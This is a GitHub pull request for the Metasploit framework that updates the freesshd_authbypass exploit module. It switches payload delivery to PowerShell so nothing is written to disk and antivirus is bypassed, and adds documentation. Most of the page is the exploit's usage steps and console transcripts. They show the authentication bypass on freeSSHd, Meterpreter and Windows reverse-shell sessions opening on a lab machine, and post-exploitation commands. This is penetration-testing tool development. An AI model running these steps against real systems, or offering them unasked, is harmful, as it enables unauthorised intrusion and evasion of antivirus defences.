New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add documentation and some enhancement to freesshd_authbypass module #10977

Merged
merged 4 commits into from Nov 20, 2018

Conversation

Projects
None yet
7 participants
@Psi0NYX
Contributor

Psi0NYX commented Nov 16, 2018

The freesshd_authbypass module was using a CmdStager that wrote the payload to disk then executed it. This was causing the exploit to fail on systems where there was an antivirus present. The use of the Powershell mixin to execute the payload removed the need to write the payload to disk so it would go past antiviruses.

There was no check being carried out at the start of the exploit method either, so I included a basic one.

Verification

  • Start msfconsole
  • Do : use exploit/windows/ssh/freesshd_authbypass
  • Do : set RHOST [target IP]
  • Do : set PAYLOAD [valid windows payload] if you want to use other payloads (x86 meterpreter by default)
  • Do : set LHOST [Your IP]
  • Do : set LPORT [valid port] (4444 by default)
  • Do : exploit
  • If target is vulnerable, a shell (meterpreter by default) should pop

Example with default payload (windows/meterpreter/reverse_tcp)

msf > use exploit/windows/ssh/freesshd_authbypass
msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
RHOST => 192.168.80.131
msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
LHOST => 192.168.80.138
msf exploit(windows/ssh/freesshd_authbypass) > exploit

[*] Started reverse TCP handler on 192.168.80.138:4444 
[*] 192.168.80.131:22 - Trying username '4Dgifts'
[*] 192.168.80.131:22 - Trying username 'EZsetup'
[*] 192.168.80.131:22 - Trying username 'OutOfBox'
[*] 192.168.80.131:22 - Trying username 'ROOT'
[*] Sending stage (179779 bytes) to 192.168.80.131
[*] Meterpreter session 2 opened (192.168.80.138:4444 -> 192.168.80.131:49166) at 2018-11-16 16:10:33 +0800

meterpreter > sysinfo
Computer        : SSH-TEST-SERVER
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 

Example with plain old reverse shell (windows/shell_reverse_tcp)

msf > use exploit/windows/ssh/freesshd_authbypass
msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
RHOST => 192.168.80.131
msf exploit(windows/ssh/freesshd_authbypass) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
LHOST => 192.168.80.138
msf exploit(windows/ssh/freesshd_authbypass) > set LPORT 4444
LPORT => 4444
msf exploit(windows/ssh/freesshd_authbypass) > exploit

[*] Started reverse TCP handler on 192.168.80.138:4444 
[*] 192.168.80.131:22 - Trying username '4Dgifts'
[*] 192.168.80.131:22 - Trying username 'EZsetup'
[*] 192.168.80.131:22 - Trying username 'OutOfBox'
[*] 192.168.80.131:22 - Trying username 'ROOT'
[*] Command shell session 1 opened (192.168.80.138:4444 -> 192.168.80.131:49167) at 2018-11-16 16:12:19 +0800



C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::5d22:f345:9ea1:a320%3
   IPv4 Address. . . . . . . . . . . : 192.168.80.131
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain

C:\Windows\system32>hostname
hostname
SSH-TEST-SERVER

C:\Windows\system32>

TODO

  • Add PowerShell as a separate target then set it as default

@Psi0NYX Psi0NYX referenced this pull request Nov 16, 2018

Closed

Small improvements to the freesshd_authbypass module #10970

8 of 8 tasks complete

@Psi0NYX Psi0NYX changed the title from Enhanced module and added documentation. to Add documentation and some enhancement to freesshd_authbypass module Nov 16, 2018

@bwatters-r7

This comment has been minimized.

Contributor

bwatters-r7 commented Nov 16, 2018

The sanity test failures are a temporary infrastructure issue on our side. The Travis failures look like some msftidy issues. You can check them here, but I recommend running msftidy locally before pushing. msftidy is in the metasploit-framework/tools directory:

tmoose@ubuntu:~/rapid7/metasploit-framework$ tools/dev/msftidy.rb 
Usage: msftidy.rb <directory or file>

While you are at it, it might be useful to check out the output from rubocop: https://github.com/rapid7/metasploit-framework/wiki/Using-Rubocop

Psi0NYX added some commits Nov 17, 2018

@Green-m Green-m added the enhancement label Nov 19, 2018

@bcoles

This comment has been minimized.

Contributor

bcoles commented Nov 20, 2018

Jenkins test this please

@busterb busterb self-assigned this Nov 20, 2018

@busterb

This comment has been minimized.

Contributor

busterb commented Nov 20, 2018

LGTM, thanks!

@bcook-r7 bcook-r7 merged commit b679bfa into rapid7:master Nov 20, 2018

2 of 3 checks passed

Metasploit Automation - Sanity Test Execution Failed to pass tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

bcook-r7 pushed a commit that referenced this pull request Nov 20, 2018

msjenkins-r7 added a commit that referenced this pull request Nov 20, 2018

@busterb

This comment has been minimized.

Contributor

busterb commented Nov 20, 2018

Release Notes

This updates the freesshd_authbypass exploit module to work more reliably in the presence of antivirus by avoiding writes to disk.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment